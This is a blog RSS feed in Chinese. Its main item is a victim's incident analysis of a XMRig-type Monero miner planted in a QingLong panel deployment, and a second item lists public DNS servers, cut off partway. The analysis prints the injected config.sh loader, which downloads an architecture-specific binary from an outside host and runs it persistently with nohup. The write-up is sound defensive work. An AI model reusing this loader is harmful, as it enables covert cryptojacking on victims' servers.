<?xml version="1.0" encoding="utf-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" version="2.0"><channel><title>七</title><link>https://www.qxhut.cn/</link><description>日常记录</description><item><title>关于青龙面板被植入挖矿木马的分析</title><link>https://www.qxhut.cn/?id=52</link><description>&lt;p&gt;&lt;/p&gt;&lt;h2&gt;一次异常 CPU 占用的排查记录：青龙面板遭遇挖矿木马&lt;/h2&gt;&lt;h3&gt;一、异常的起因&lt;/h3&gt;&lt;p&gt;事情发生在 &lt;strong&gt;2 月 7 日下午&lt;/strong&gt;。当时我和老婆正在吃饭，突然注意到放在一旁的小主机（&lt;strong&gt;R5 5600G&lt;/strong&gt;）风扇声音异常大，几乎是满速运转。&lt;/p&gt;&lt;p&gt;第一反应是有点不合理：&lt;/p&gt;&lt;blockquote&gt;&lt;p&gt;冬天室温不高，这台机器平时也不怎么满载，怎么会突然这么吵？&lt;/p&gt;&lt;/blockquote&gt;&lt;p&gt;几分钟后，我在钉钉上收到了宝塔的告警通知：&lt;/p&gt;&lt;p&gt;&lt;img src=&quot;https://www.qxhut.cn/zb_users/upload/2026/02/202602101770692029426133.jpg&quot; alt=&quot;dd3bc5e4c3a268de14ecec4ac16cfd46.jpg&quot; width=&quot;540&quot; height=&quot;1511&quot; style=&quot;width: 540px; height: 1511px;&quot;/&gt;&lt;/p&gt;&lt;pre&gt;服务器：宝塔&amp;nbsp;Linux&amp;nbsp;面板
IP&amp;nbsp;地址：192.168.9.22
发送时间：2026-02-07&amp;nbsp;19:02:54
通知类型：CPU&amp;nbsp;高占用告警
告警内容：最近&amp;nbsp;5&amp;nbsp;分钟内&amp;nbsp;CPU&amp;nbsp;平均占用率为&amp;nbsp;83.18%，高于告警值&amp;nbsp;80%&lt;/pre&gt;&lt;p&gt;这基本确认了不是错觉，&lt;strong&gt;系统确实出现了异常负载&lt;/strong&gt;。&lt;/p&gt;&lt;hr/&gt;&lt;h3&gt;二、定位异常进程&lt;/h3&gt;&lt;p&gt;登录服务器后第一时间查看进程情况，很快发现了一个极其异常的进程：&lt;/p&gt;&lt;p&gt;&lt;img src=&quot;https://www.qxhut.cn/zb_users/upload/2026/02/202602101770691969549633.jpg&quot; alt=&quot;3f4ef29d3c3d9e9dfe9961389450ab98.jpg&quot; width=&quot;896&quot; height=&quot;530&quot; style=&quot;width: 896px; height: 530px;&quot;/&gt;&lt;/p&gt;&lt;pre&gt;1795937&amp;nbsp;root&amp;nbsp;20&amp;nbsp;0&amp;nbsp;2476464&amp;nbsp;2.3g&amp;nbsp;4&amp;nbsp;S&amp;nbsp;798.9&amp;nbsp;15.4&amp;nbsp;166:59.08&amp;nbsp;.fullgc&lt;/pre&gt;&lt;p&gt;几个明显异常点：&lt;/p&gt;&lt;ul class=&quot; list-paddingleft-2&quot;&gt;&lt;li&gt;&lt;p&gt;进程名：&lt;strong&gt;&lt;code inline=&quot;&quot;&gt;.fullgc&lt;/code&gt;&lt;/strong&gt;（隐藏文件名）&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;CPU 占用：接近 &lt;strong&gt;800%&lt;/strong&gt;（多核跑满）&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;运行用户：&lt;strong&gt;root&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;常驻运行&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;基本可以判定：&lt;/p&gt;&lt;blockquote&gt;&lt;p&gt;&lt;strong&gt;这不是正常服务进程，极大概率是恶意程序。&lt;/strong&gt;&lt;/p&gt;&lt;/blockquote&gt;&lt;p&gt;进一步确认该文件位置：&lt;/p&gt;&lt;pre&gt;/ql/data/db/.fullgc&lt;/pre&gt;&lt;p&gt;在完成本地排查并确认 &lt;code data-start=&quot;183&quot; data-end=&quot;192&quot;&gt;.fullgc&lt;/code&gt; 进程行为异常后，为了进一步验证其性质，我将 &lt;strong data-start=&quot;215&quot; data-end=&quot;240&quot;&gt;&lt;code data-start=&quot;217&quot; data-end=&quot;238&quot;&gt;/ql/data/db/.fullgc&lt;/code&gt;&lt;/strong&gt; 文件上传至 &lt;strong data-start=&quot;247&quot; data-end=&quot;267&quot;&gt;微步在线（ThreatBook）&lt;/strong&gt; 进行分析。&lt;/p&gt;&lt;p&gt;https://s.threatbook.com/report/file/a939048e4374176a6259a19da544423cdc838e532a978fbb2508fefea8e5c88a&lt;/p&gt;&lt;p&gt;&lt;img src=&quot;https://www.qxhut.cn/zb_users/upload/2026/02/202602101770692264322239.png&quot; alt=&quot;d158b4ba-7ca1-4e0e-9e0c-9c779328f1f7.png&quot;/&gt;&lt;/p&gt;&lt;h3 data-start=&quot;275&quot; data-end=&quot;289&quot;&gt;1️⃣ 文件基础信息&lt;/h3&gt;&lt;p data-start=&quot;291&quot; data-end=&quot;304&quot;&gt;微步识别到该文件特征如下：&lt;/p&gt;&lt;ul data-start=&quot;306&quot; data-end=&quot;491&quot; class=&quot; list-paddingleft-2&quot;&gt;&lt;li&gt;&lt;p data-start=&quot;308&quot; data-end=&quot;355&quot;&gt;文件类型：&lt;br data-start=&quot;313&quot; data-end=&quot;316&quot;/&gt;&lt;strong data-start=&quot;318&quot; data-end=&quot;355&quot;&gt;ELF 64-bit LSB executable（x86_64）&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p data-start=&quot;358&quot; data-end=&quot;395&quot;&gt;编译方式：&lt;br data-start=&quot;363&quot; data-end=&quot;366&quot;/&gt;&lt;strong data-start=&quot;368&quot; data-end=&quot;395&quot;&gt;静态链接（statically linked）&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p data-start=&quot;398&quot; data-end=&quot;419&quot;&gt;文件大小：&lt;br data-start=&quot;403&quot; data-end=&quot;406&quot;/&gt;&lt;strong data-start=&quot;408&quot; data-end=&quot;419&quot;&gt;2.93 MB&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p data-start=&quot;422&quot; data-end=&quot;448&quot;&gt;首次提交时间：&lt;br data-start=&quot;429&quot; data-end=&quot;432&quot;/&gt;&lt;strong data-start=&quot;434&quot; data-end=&quot;448&quot;&gt;2026-02-07&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p data-start=&quot;451&quot; data-end=&quot;491&quot;&gt;分析环境：&lt;br data-start=&quot;456&quot; data-end=&quot;459&quot;/&gt;&lt;strong data-start=&quot;461&quot; data-end=&quot;491&quot;&gt;Linux / Ubuntu 17.04 64bit&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p data-start=&quot;493&quot; data-end=&quot;518&quot;&gt;文件本身具备典型的 Linux 恶意程序特征：&lt;/p&gt;&lt;blockquote data-start=&quot;519&quot; data-end=&quot;550&quot;&gt;&lt;p data-start=&quot;521&quot; data-end=&quot;550&quot;&gt;静态编译 + 无符号信息 + 体积适中，便于跨发行版运行。&lt;/p&gt;&lt;/blockquote&gt;&lt;hr data-start=&quot;552&quot; data-end=&quot;555&quot;/&gt;&lt;h3 data-start=&quot;557&quot; data-end=&quot;571&quot;&gt;2️⃣ 威胁判定结果&lt;/h3&gt;&lt;p data-start=&quot;573&quot; data-end=&quot;584&quot;&gt;微步给出的综合判定为：&lt;/p&gt;&lt;ul data-start=&quot;586&quot; data-end=&quot;638&quot; class=&quot; list-paddingleft-2&quot;&gt;&lt;li&gt;&lt;p data-start=&quot;588&quot; data-end=&quot;599&quot;&gt;&lt;strong data-start=&quot;588&quot; data-end=&quot;599&quot;&gt;威胁等级：可疑&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p data-start=&quot;602&quot; data-end=&quot;619&quot;&gt;&lt;strong data-start=&quot;602&quot; data-end=&quot;619&quot;&gt;木马家族：SusMiner&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p data-start=&quot;622&quot; data-end=&quot;638&quot;&gt;&lt;strong data-start=&quot;622&quot; data-end=&quot;638&quot;&gt;引擎命中率：1 / 28&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p data-start=&quot;640&quot; data-end=&quot;666&quot;&gt;虽然命中率不高，但这是&lt;strong data-start=&quot;651&quot; data-end=&quot;665&quot;&gt;矿工类木马的常见特征&lt;/strong&gt;：&lt;/p&gt;&lt;blockquote data-start=&quot;668&quot; data-end=&quot;715&quot;&gt;&lt;p data-start=&quot;670&quot; data-end=&quot;715&quot;&gt;挖矿程序通常不会触发大量传统 AV 规则&lt;br data-start=&quot;690&quot; data-end=&quot;693&quot;/&gt;更依赖 &lt;strong data-start=&quot;699&quot; data-end=&quot;707&quot;&gt;行为特征&lt;/strong&gt; 而非特征码识别&lt;/p&gt;&lt;/blockquote&gt;&lt;hr data-start=&quot;717&quot; data-end=&quot;720&quot;/&gt;&lt;h3 data-start=&quot;722&quot; data-end=&quot;742&quot;&gt;3️⃣ 关键 IOC（威胁情报）&lt;/h3&gt;&lt;p data-start=&quot;744&quot; data-end=&quot;766&quot;&gt;微步在分析过程中提取到了明确的恶意 IOC：&lt;/p&gt;&lt;pre class=&quot;overflow-visible! px-0!&quot; data-start=&quot;768&quot; data-end=&quot;795&quot;&gt;xmr.kryptex.network&lt;/pre&gt;&lt;ul data-start=&quot;797&quot; data-end=&quot;857&quot; class=&quot; list-paddingleft-2&quot;&gt;&lt;li&gt;&lt;p data-start=&quot;799&quot; data-end=&quot;808&quot;&gt;类型：Domain&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p data-start=&quot;811&quot; data-end=&quot;820&quot;&gt;判定：&lt;strong data-start=&quot;814&quot; data-end=&quot;820&quot;&gt;恶意&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p data-start=&quot;823&quot; data-end=&quot;857&quot;&gt;行为含义：&lt;br data-start=&quot;828&quot; data-end=&quot;831&quot;/&gt;👉 &lt;strong data-start=&quot;836&quot; data-end=&quot;857&quot;&gt;XMR（Monero）矿池通信域名&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p data-start=&quot;859&quot; data-end=&quot;876&quot;&gt;这与服务器上观测到的行为高度一致：&lt;/p&gt;&lt;ul data-start=&quot;878&quot; data-end=&quot;912&quot; class=&quot; list-paddingleft-2&quot;&gt;&lt;li&gt;&lt;p data-start=&quot;880&quot; data-end=&quot;889&quot;&gt;CPU 长时间满载&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p data-start=&quot;892&quot; data-end=&quot;897&quot;&gt;多线程运行&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p data-start=&quot;900&quot; data-end=&quot;905&quot;&gt;隐藏进程名&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p data-start=&quot;908&quot; data-end=&quot;912&quot;&gt;后台常驻&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr data-start=&quot;914&quot; data-end=&quot;917&quot;/&gt;&lt;h3 data-start=&quot;919&quot; data-end=&quot;933&quot;&gt;4️⃣ 行为分析要点&lt;/h3&gt;&lt;p data-start=&quot;935&quot; data-end=&quot;953&quot;&gt;微步行为检测中识别出多个高风险动作：&lt;/p&gt;&lt;ul data-start=&quot;955&quot; data-end=&quot;1027&quot; class=&quot; list-paddingleft-2&quot;&gt;&lt;li&gt;&lt;p data-start=&quot;957&quot; data-end=&quot;981&quot;&gt;使用 &lt;strong data-start=&quot;960&quot; data-end=&quot;967&quot;&gt;UPX&lt;/strong&gt; 对程序进行压缩（规避检测）&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p data-start=&quot;984&quot; data-end=&quot;1005&quot;&gt;运行特征符合 &lt;strong data-start=&quot;991&quot; data-end=&quot;1005&quot;&gt;XMRig 矿工程序&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p data-start=&quot;1008&quot; data-end=&quot;1016&quot;&gt;存在网络通信行为&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p data-start=&quot;1019&quot; data-end=&quot;1027&quot;&gt;持续消耗系统资源&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p data-start=&quot;1029&quot; data-end=&quot;1055&quot;&gt;这与我在服务器上观察到的现象形成了&lt;strong data-start=&quot;1046&quot; data-end=&quot;1054&quot;&gt;完整闭环&lt;/strong&gt;：&lt;/p&gt;&lt;blockquote data-start=&quot;1057&quot; data-end=&quot;1093&quot;&gt;&lt;p data-start=&quot;1059&quot; data-end=&quot;1093&quot;&gt;&lt;strong data-start=&quot;1059&quot; data-end=&quot;1093&quot;&gt;本地行为 + 脚本分析 + 第三方沙箱结果 = 挖矿木马实锤&lt;/strong&gt;&lt;/p&gt;&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;hr/&gt;&lt;p&gt;&lt;br/&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;h3&gt;三、确认存在持久化机制&lt;/h3&gt;&lt;p&gt;我尝试直接重启服务器，结果发现：&lt;/p&gt;&lt;ul class=&quot; list-paddingleft-2&quot;&gt;&lt;li&gt;&lt;p&gt;系统刚启动&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;&lt;code inline=&quot;&quot;&gt;.fullgc&lt;/code&gt; 进程立刻重新出现&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;这说明它并不是临时启动的，而是被写入了&lt;strong&gt;某个启动 / 守护脚本&lt;/strong&gt;。&lt;/p&gt;&lt;p&gt;结合路径 &lt;code inline=&quot;&quot;&gt;/ql/data/db/&lt;/code&gt;，第一时间怀疑的是 &lt;strong&gt;青龙面板（QingLong）相关组件被植入了恶意代码&lt;/strong&gt;。&lt;/p&gt;&lt;hr/&gt;&lt;h3&gt;四、排查植入点：config.sh 被篡改&lt;/h3&gt;&lt;p&gt;通过 &lt;code inline=&quot;&quot;&gt;grep&lt;/code&gt; 排查青龙相关脚本后，在 &lt;strong&gt;&lt;code inline=&quot;&quot;&gt;config.sh&lt;/code&gt;&lt;/strong&gt; 中发现了被植入的恶意启动代码（节选）：&lt;/p&gt;&lt;pre&gt;d=&amp;quot;${QL_DIR:-/ql}/data/db&amp;quot;
b=&amp;quot;$d/.fullgc&amp;quot;

case&amp;nbsp;&amp;quot;$(uname&amp;nbsp;-s)-$(uname&amp;nbsp;-m)&amp;quot;&amp;nbsp;in
&amp;nbsp;&amp;nbsp;Linux-x86_64|Linux-amd64)
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;u=&amp;quot;https://file.551911.xyz/fullgc/fullgc-linux-x86_64&amp;quot;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;;;
&amp;nbsp;&amp;nbsp;Linux-aarch64|Linux-arm64)
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;u=&amp;quot;https://file.551911.xyz/fullgc/fullgc-linux-aarch64&amp;quot;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;;;
&amp;nbsp;&amp;nbsp;Darwin-x86_64)
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;u=&amp;quot;https://file.551911.xyz/fullgc/fullgc-macos-x86_64&amp;quot;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;;;
&amp;nbsp;&amp;nbsp;Darwin-arm64)
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;u=&amp;quot;https://file.551911.xyz/fullgc/fullgc-macos-arm64&amp;quot;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;;;
esac

[&amp;nbsp;-n&amp;nbsp;&amp;quot;$u&amp;quot;&amp;nbsp;]&amp;nbsp;&amp;amp;&amp;amp;&amp;nbsp;[&amp;nbsp;!&amp;nbsp;-f&amp;nbsp;&amp;quot;$b&amp;quot;&amp;nbsp;]&amp;nbsp;&amp;amp;&amp;amp;&amp;nbsp;{
&amp;nbsp;&amp;nbsp;curl&amp;nbsp;-fsSL&amp;nbsp;-o&amp;nbsp;&amp;quot;$b&amp;quot;&amp;nbsp;&amp;quot;$u&amp;quot;&amp;nbsp;||&amp;nbsp;wget&amp;nbsp;-qO&amp;nbsp;&amp;quot;$b&amp;quot;&amp;nbsp;&amp;quot;$u&amp;quot;
}
chmod&amp;nbsp;+x&amp;nbsp;&amp;quot;$b&amp;quot;

[&amp;nbsp;-f&amp;nbsp;&amp;quot;$b&amp;quot;&amp;nbsp;]&amp;nbsp;&amp;amp;&amp;amp;&amp;nbsp;!&amp;nbsp;ps&amp;nbsp;-ef&amp;nbsp;|&amp;nbsp;grep&amp;nbsp;-v&amp;nbsp;grep&amp;nbsp;|&amp;nbsp;grep&amp;nbsp;-qF&amp;nbsp;&amp;quot;.fullgc&amp;quot;&amp;nbsp;\
&amp;nbsp;&amp;nbsp;&amp;amp;&amp;amp;&amp;nbsp;nohup&amp;nbsp;&amp;quot;$b&amp;quot;&amp;nbsp;&amp;gt;/dev/null&amp;nbsp;2&amp;gt;&amp;amp;1&amp;nbsp;&amp;amp;&lt;/pre&gt;&lt;p&gt;这段代码的行为非常明确：&lt;/p&gt;&lt;ul class=&quot; list-paddingleft-2&quot;&gt;&lt;li&gt;&lt;p&gt;根据系统架构下载对应的 &lt;strong&gt;&lt;code inline=&quot;&quot;&gt;.fullgc&lt;/code&gt; 二进制&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;写入 &lt;code inline=&quot;&quot;&gt;/ql/data/db/&lt;/code&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;赋予执行权限&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;若未运行则后台 &lt;code inline=&quot;&quot;&gt;nohup&lt;/code&gt; 启动&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;实现持久化 + 自拉起&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;strong&gt;典型的挖矿木马行为。&lt;/strong&gt;&lt;/p&gt;&lt;hr/&gt;&lt;h3&gt;五、影响范围判断&lt;/h3&gt;&lt;p&gt;在进一步排查后发现一个明显规律：&lt;/p&gt;&lt;ul class=&quot; list-paddingleft-2&quot;&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;开启公网 IPv4 访问的服务器：全部被植入&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;未暴露公网 IPv4 的服务器：完全正常&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;这几乎可以确认：&lt;/p&gt;&lt;blockquote&gt;&lt;p&gt;攻击入口来自公网暴露的服务&lt;br/&gt;并非误操作或内部脚本问题&lt;/p&gt;&lt;/blockquote&gt;&lt;hr/&gt;&lt;h3&gt;六、社区验证：并非个例&lt;/h3&gt;&lt;p&gt;&lt;strong&gt;2 月 9 日（周一）&lt;/strong&gt;，我在青龙官方仓库中看到已有用户反馈类似问题：&lt;/p&gt;&lt;p&gt;🔗 &lt;a href=&quot;https://github.com/whyour/qinglong/issues/2923&quot;&gt;https://github.com/whyour/qinglong/issues/2923&lt;/a&gt;&lt;/p&gt;&lt;p&gt;这进一步确认了这不是单一环境问题，而是&lt;strong&gt;已有攻击者在针对青龙面板进行扫描和利用&lt;/strong&gt;。&lt;/p&gt;&lt;hr/&gt;&lt;h3&gt;七、处理与结果&lt;/h3&gt;&lt;p&gt;采取的处理措施：&lt;/p&gt;&lt;ol class=&quot; list-paddingleft-2&quot;&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;删除恶意文件&lt;/strong&gt;&lt;/p&gt;&lt;pre&gt;/ql/data/db/.fullgc&lt;/pre&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;清理被植入的 config.sh&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;关闭公网 IPv4 的所有访问入口&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;暂时不对外暴露任何管理服务&lt;/p&gt;&lt;/li&gt;&lt;/ol&gt;&lt;p&gt;处理完成后：&lt;/p&gt;&lt;ul class=&quot; list-paddingleft-2&quot;&gt;&lt;li&gt;&lt;p&gt;连续观察 &lt;strong&gt;2 天&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;CPU 占用恢复正常&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;未再发现 &lt;code inline=&quot;&quot;&gt;.fullgc&lt;/code&gt; 或异常进程&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;系统运行稳定&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr/&gt;&lt;h3&gt;八、总结&lt;/h3&gt;&lt;p&gt;这次事件的核心教训非常明确：&lt;/p&gt;&lt;ul class=&quot; list-paddingleft-2&quot;&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;管理面板暴露公网 = 高风险&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;青龙本身不是问题，但&lt;strong&gt;公网暴露 + 弱防护&lt;/strong&gt;一定会被扫&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;隐藏进程名 + 自启动 + 高 CPU，占用 = 典型挖矿木马特征&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;如果你的服务器上有类似现象，&lt;strong&gt;第一时间检查：&lt;/strong&gt;&lt;/p&gt;&lt;ul class=&quot; list-paddingleft-2&quot;&gt;&lt;li&gt;&lt;p&gt;&lt;code inline=&quot;&quot;&gt;/ql/data/db/&lt;/code&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;code inline=&quot;&quot;&gt;config.sh&lt;/code&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;是否存在 &lt;code inline=&quot;&quot;&gt;.fullgc&lt;/code&gt;、&lt;code inline=&quot;&quot;&gt;.xmrig&lt;/code&gt; 等隐藏可执行文件&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;br/&gt;&lt;/p&gt;</description><pubDate>Tue, 10 Feb 2026 10:38:16 +0800</pubDate></item><item><title>公共DNS服务器</title><link>https://www.qxhut.cn/?id=51</link><description>&lt;p&gt;全网公共 DNS 服务器汇总与实测选择建议（IPv4 / IPv6 / DoH / DoT）&lt;/p&gt;&lt;blockquote&gt;&lt;p&gt;本文基于 &lt;strong&gt;Google / Bing / 百度 / DuckDuckGo 等搜索引擎索引内容&lt;/strong&gt;，结合运营商公开信息、技术社区（GitHub、Stack Overflow、V2EX 等）以及多年网络环境实践经验整理而成，长期更新。&lt;/p&gt;&lt;/blockquote&gt;&lt;p&gt;DNS（Domain Name System）是互联网中最基础、却最容易被忽略的组件之一。&lt;br/&gt;DNS 的选择，直接影响 &lt;strong&gt;访问速度、稳定性、隐私安全，甚至是否被劫持或重定向&lt;/strong&gt;。&lt;/p&gt;&lt;p&gt;本文将对&lt;strong&gt;国内外主流公共 DNS 服务器&lt;/strong&gt;进行系统整理，并给出清晰的使用建议。&lt;/p&gt;&lt;hr/&gt;&lt;h2&gt;一、为什么有必要更换 DNS？&lt;/h2&gt;&lt;p&gt;在默认情况下，很多用户使用的是：&lt;/p&gt;&lt;ul class=&quot; list-paddingleft-2&quot;&gt;&lt;li&gt;&lt;p&gt;运营商下发的 DNS&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;路由器自动获取的 DNS&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;这些 DNS 往往存在以下问题：&lt;/p&gt;&lt;ul class=&quot; list-paddingleft-2&quot;&gt;&lt;li&gt;&lt;p&gt;❌ DNS 劫持、广告跳转&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;❌ 解析慢、节点少&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;❌ 不支持加密（DoH / DoT）&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;❌ 对 IPv6 支持不完善&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;因此，&lt;strong&gt;主动选择合适的公共 DNS&lt;/strong&gt;，已经成为网络优化的基础操作之一。&lt;/p&gt;&lt;hr/&gt;&lt;h2&gt;二、DNS 协议类型说明（非常重要）&lt;/h2&gt;&lt;p&gt;目前主流 DNS 解析方式包括：&lt;/p&gt;&lt;h3&gt;1️⃣ 传统 DNS&lt;/h3&gt;&lt;ul class=&quot; list-paddingleft-2&quot;&gt;&lt;li&gt;&lt;p&gt;端口：UDP / TCP 53&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;明文传输&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;易被监听或劫持&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;h3&gt;2️⃣ DoH（DNS over HTTPS）✅&lt;/h3&gt;&lt;ul class=&quot; list-paddingleft-2&quot;&gt;&lt;li&gt;&lt;p&gt;端口：443&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;与 HTTPS 流量混合&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;隐私与穿透性最好&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;h3&gt;3️⃣ DoT（DNS over TLS）&lt;/h3&gt;&lt;ul class=&quot; list-paddingleft-2&quot;&gt;&lt;li&gt;&lt;p&gt;端口：853&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;明确的 DNS 加密通道&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;稳定、规范&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;blockquote&gt;&lt;p&gt;&lt;strong&gt;推荐优先级：DoH ＞ DoT ＞ 传统 DNS&lt;/strong&gt;&lt;/p&gt;&lt;/blockquote&gt;&lt;hr/&gt;&lt;h2&gt;三、国内主流公共 DNS（速度优先）&lt;/h2&gt;&lt;h3&gt;阿里云 DNS（AliDNS）&lt;/h3&gt;&lt;p&gt;&lt;strong&gt;综合评价：⭐⭐⭐⭐⭐&lt;/strong&gt;&lt;/p&gt;&lt;ul class=&quot; list-paddingleft-2&quot;&gt;&lt;li&gt;&lt;p&gt;国内覆盖广&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;稳定性高&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;DoH / DoT / IPv6 支持完善&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;strong&gt;IPv4&lt;/strong&gt;&lt;/p&gt;&lt;pre&gt;223.5.5.5
223.6.6.6&lt;/pre&gt;&lt;p&gt;&lt;strong&gt;IPv6&lt;/strong&gt;&lt;/p&gt;&lt;pre&gt;2400:3200::1
2400:3200:baba::1&lt;/pre&gt;&lt;p&gt;&lt;strong&gt;DoH&lt;/strong&gt;&lt;/p&gt;&lt;pre&gt;https://dns.alidns.com/dns-query&lt;/pre&gt;&lt;p&gt;&lt;strong&gt;DoT&lt;/strong&gt;&lt;/p&gt;&lt;pre&gt;dns.alidns.com&lt;/pre&gt;&lt;p&gt;👉 &lt;strong&gt;国内环境首选&lt;/strong&gt;&lt;/p&gt;&lt;hr/&gt;&lt;h3&gt;DNSPod（腾讯 DNS）&lt;/h3&gt;&lt;p&gt;&lt;strong&gt;特点：&lt;/strong&gt;&lt;/p&gt;&lt;ul class=&quot; list-paddingleft-2&quot;&gt;&lt;li&gt;&lt;p&gt;企业级解析体系&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;国内访问表现优秀&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;strong&gt;IPv4&lt;/strong&gt;&lt;/p&gt;&lt;pre&gt;119.29.29.29
119.28.28.28&lt;/pre&gt;&lt;p&gt;&lt;strong&gt;DoH&lt;/strong&gt;&lt;/p&gt;&lt;pre&gt;https://doh.pub/dns-query&lt;/pre&gt;&lt;p&gt;&lt;strong&gt;DoT&lt;/strong&gt;&lt;/p&gt;&lt;pre&gt;dot.pub&lt;/pre&gt;&lt;hr/&gt;&lt;h3&gt;114 DNS&lt;/h3&gt;&lt;p&gt;&lt;strong&gt;特点：&lt;/strong&gt;&lt;/p&gt;&lt;ul class=&quot; list-paddingleft-2&quot;&gt;&lt;li&gt;&lt;p&gt;老牌稳定&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;提供安全版 / 家庭版&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;strong&gt;IPv4&lt;/strong&gt;&lt;/p&gt;&lt;pre&gt;114.114.114.114
